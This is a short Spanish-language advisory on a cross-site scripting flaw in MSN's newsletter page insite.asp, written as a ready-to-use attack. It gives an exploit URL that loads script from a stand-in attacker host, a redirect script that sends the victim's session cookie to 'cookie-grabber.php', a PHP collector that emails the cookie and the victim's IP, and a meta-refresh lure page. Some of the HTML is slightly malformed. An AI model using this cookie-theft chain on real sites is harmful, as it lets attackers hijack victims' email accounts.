Hotmail/MSN Cross Site Scripting Vulnerability

Detalles:
El script¨ insite.asp¨ de newsletter.msn.com es propensa a un ataque del tipo XSS. Este problema es debido al fracaso para esterilizar correctamente la entrada suministrada por usuario.

Impacto:
Un atacante puede explotar esta vulnerabilidad para ejecutar codigo arbitrario en el navegador de un usuario autentificado en el contexto del msn webpage. Podria producir el robo de la cookie de Autenticación dandole al atacante el acceso temporal a la cuenta de correo electrónico de la víctima (hasta que la cookie expire - aproximadamente 24 horas) así como otro tipo de ataques.

Exploit

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src="http://atacante/redir.js">

Screenshot

Donde el código de redir.js puede ser:

location.href='http://sitioatacante/cookie-grabber.php?cookie='+escape(document.cookie)>

y cookie-grabber.php puede contener:

<? $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $msg = "Cookie: $cookie\nIP Address: $ip"; $subject = "cookie"; mail("tumail@email.org", $subject, $msg); header ("location: http://sitioatacante/algo.jpg"); ?>

el atacante también podria usar un archivo HTML para remitir a la víctima a la posición xss

<meta equiv="refresh" content="" url="http://newsletters.msn.com/xs-v3/insite.asp?CU=" re="')"></script><script src="http://atacante/redir.js">">

Prueba de Concepto
Screenshot